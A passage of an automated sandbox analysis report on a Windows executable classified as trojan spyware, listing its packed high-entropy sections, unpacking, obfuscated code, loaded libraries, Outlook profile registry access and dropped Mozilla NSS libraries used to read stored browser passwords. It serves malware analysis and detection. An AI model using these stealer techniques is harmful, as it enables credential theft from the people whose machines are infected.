Source: file.exe, 00000000.00000003.2199205822.000000002FDA0000.00000004.00000020.00020000.00000000.sdmp, JDGIECGIEBKJJJJKEGHJJJKEBA.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C6BB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB8C0 rand_s,NtQueryVirtualMemory,	0_2_6C6BB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C6BB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C65F280

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00328810	0_2_00328810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481898	0_2_00481898
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004710A4	0_2_004710A4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003E392C	0_2_003E392C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004231D9	0_2_004231D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003CB9C7	0_2_003CB9C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004F7AC9	0_2_004F7AC9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476ACB	0_2_00476ACB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0051DADE	0_2_0051DADE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043CAE0	0_2_0043CAE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0047CA9F	0_2_0047CA9F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0046DA9F	0_2_0046DA9F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004832BF	0_2_004832BF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003FD2C2	0_2_003FD2C2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00472B44	0_2_00472B44
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0042CB44	0_2_0042CB44
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004493C4	0_2_004493C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00369BF7	0_2_00369BF7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0047E44C	0_2_0047E44C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004794B9	0_2_004794B9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004745DD	0_2_004745DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0047FE01	0_2_0047FE01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00477EE3	0_2_00477EE3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0046BEF5	0_2_0046BEF5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00484E88	0_2_00484E88
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00434718	0_2_00434718
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040E7B8	0_2_0040E7B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6535A0	0_2_6C6535A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C665440	0_2_6C665440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C545C	0_2_6C6C545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C542B	0_2_6C6C542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CAC00	0_2_6C6CAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695C10	0_2_6C695C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2C10	0_2_6C6A2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65D4E0	0_2_6C65D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C696CF0	0_2_6C696CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6664C0	0_2_6C6664C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D4D0	0_2_6C67D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B34A0	0_2_6C6B34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BC4A0	0_2_6C6BC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80	0_2_6C666C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FD00	0_2_6C66FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67ED10	0_2_6C67ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C680512	0_2_6C680512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B85F0	0_2_6C6B85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C690DD0	0_2_6C690DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C6E63	0_2_6C6C6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C670	0_2_6C65C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2E4E	0_2_6C6A2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C674640	0_2_6C674640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C679E50	0_2_6C679E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C693E50	0_2_6C693E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B9E30	0_2_6C6B9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A5600	0_2_6C6A5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697E10	0_2_6C697E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C76E3	0_2_6C6C76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65BEF0	0_2_6C65BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FEF0	0_2_6C66FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B4EA0	0_2_6C6B4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BE680	0_2_6C6BE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C675E90	0_2_6C675E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C669F00	0_2_6C669F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697710	0_2_6C697710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65DFE0	0_2_6C65DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C686FF0	0_2_6C686FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A77A0	0_2_6C6A77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69F070	0_2_6C69F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C678850	0_2_6C678850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D850	0_2_6C67D850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69B820	0_2_6C69B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A4820	0_2_6C6A4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C667810	0_2_6C667810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67C0E0	0_2_6C67C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6958E0	0_2_6C6958E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C50C7	0_2_6C6C50C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6860A0	0_2_6C6860A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66D960	0_2_6C66D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB970	0_2_6C6AB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CB170	0_2_6C6CB170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67A940	0_2_6C67A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C9A0	0_2_6C65C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68D9B0	0_2_6C68D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695190	0_2_6C695190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B2990	0_2_6C6B2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C699A60	0_2_6C699A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C671AF0	0_2_6C671AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69E2F0	0_2_6C69E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C698AC0	0_2_6C698AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6522A0	0_2_6C6522A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C684AA0	0_2_6C684AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66CAB0	0_2_6C66CAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C2AB0	0_2_6C6C2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CBA90	0_2_6C6CBA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66C370	0_2_6C66C370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C655340	0_2_6C655340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69D320	0_2_6C69D320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C53C8	0_2_6C6C53C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65F380	0_2_6C65F380

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C68CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6994D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 000A45C0 appears 316 times

Source: file.exe, 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2269468658.000000006C8D5000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: aqokowyf ZLIB complexity 0.9948938740373223

Source: file.exe, 00000000.00000003.2040063346.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C6B7030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000B9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_000B9600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000B3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_000B3720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\QY7OFF2D.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2252440602.000000001DB30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2269319696.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2268755441.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2252440602.000000001DB30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2269319696.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2268755441.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2252440602.000000001DB30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2269319696.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2268755441.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2252440602.000000001DB30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2269319696.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2268755441.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2252440602.000000001DB30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2269319696.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2268755441.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2252440602.000000001DB30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2268755441.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2252440602.000000001DB30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2269319696.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2268755441.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2099646873.000000000140C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2107169472.000000001DA38000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123792029.000000001DA2B000.00000004.00000020.00020000.00000000.sdmp, KFIJJEGHDAEBGCAKJKFH.0.dr, DGCBAFIJDGHCAKECAEGC.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2252440602.000000001DB30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2268755441.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2252440602.000000001DB30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2268755441.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1885184 > 1048576

Source: file.exe

Static PE information: Raw size of aqokowyf is bigger than: 0x100000 < 0x1a6000

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2269319696.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2269319696.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.a0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;aqokowyf:EW;vexjavgk:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;aqokowyf:EW;vexjavgk:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_000B9860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1cffab should be: 0x1d26e7

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: aqokowyf
Source: file.exe	Static PE information: section name: vexjavgk
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0056A85D push 438E88B0h; mov dword ptr [esp], edx	0_2_0056A8B5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0056A85D push 10DBD611h; mov dword ptr [esp], ebp	0_2_0056A8E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00328810 push edi; mov dword ptr [esp], 6AA509E0h	0_2_0032882E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00328810 push eax; mov dword ptr [esp], 0000001Eh	0_2_00328859
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00328810 push 0C2DB0C6h; mov dword ptr [esp], eax	0_2_003288E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00328810 push 7F9E8AE8h; mov dword ptr [esp], edx	0_2_00328929
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00328810 push 4F87BB63h; mov dword ptr [esp], ecx	0_2_0032898F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0056D862 push esi; mov dword ptr [esp], edx	0_2_0056D88F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000BB035 push ecx; ret	0_2_000BB048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0055803D push edx; mov dword ptr [esp], 123AE4EFh	0_2_00558059
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0055803D push 34AE1058h; mov dword ptr [esp], edx	0_2_005580A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005090F0 push ebp; mov dword ptr [esp], 640E09D2h	0_2_005097A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004AC88B push 4B3EA179h; mov dword ptr [esp], esi	0_2_004AC8C5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004AC88B push 0EA5249Eh; mov dword ptr [esp], ecx	0_2_004AC904
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481898 push ebp; mov dword ptr [esp], edi	0_2_004818A5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481898 push esi; mov dword ptr [esp], edi	0_2_004818BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481898 push esi; mov dword ptr [esp], 7FF9EC44h	0_2_004819D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481898 push eax; mov dword ptr [esp], ebx	0_2_004819E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481898 push 7AC79334h; mov dword ptr [esp], ebx	0_2_00481A6E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481898 push edx; mov dword ptr [esp], ecx	0_2_00481A94
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481898 push eax; mov dword ptr [esp], esi	0_2_00481B13
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481898 push edx; mov dword ptr [esp], 7DFA158Ch	0_2_00481B5D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481898 push ebx; mov dword ptr [esp], eax	0_2_00481BF2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481898 push edi; mov dword ptr [esp], 5FFE4D22h	0_2_00481C03
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481898 push 02007645h; mov dword ptr [esp], esp	0_2_00481C12
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481898 push edx; mov dword ptr [esp], 48CD53DBh	0_2_00481C39
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481898 push edi; mov dword ptr [esp], ebp	0_2_00481C4F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481898 push ebp; mov dword ptr [esp], ecx	0_2_00481C68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481898 push 5C571D95h; mov dword ptr [esp], esp	0_2_00481D48
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481898 push edi; mov dword ptr [esp], esi	0_2_00481D56
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481898 push eax; mov dword ptr [esp], ecx	0_2_00481DB2

Source: file.exe

Static PE information: section name: aqokowyf entropy: 7.953728087225671

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
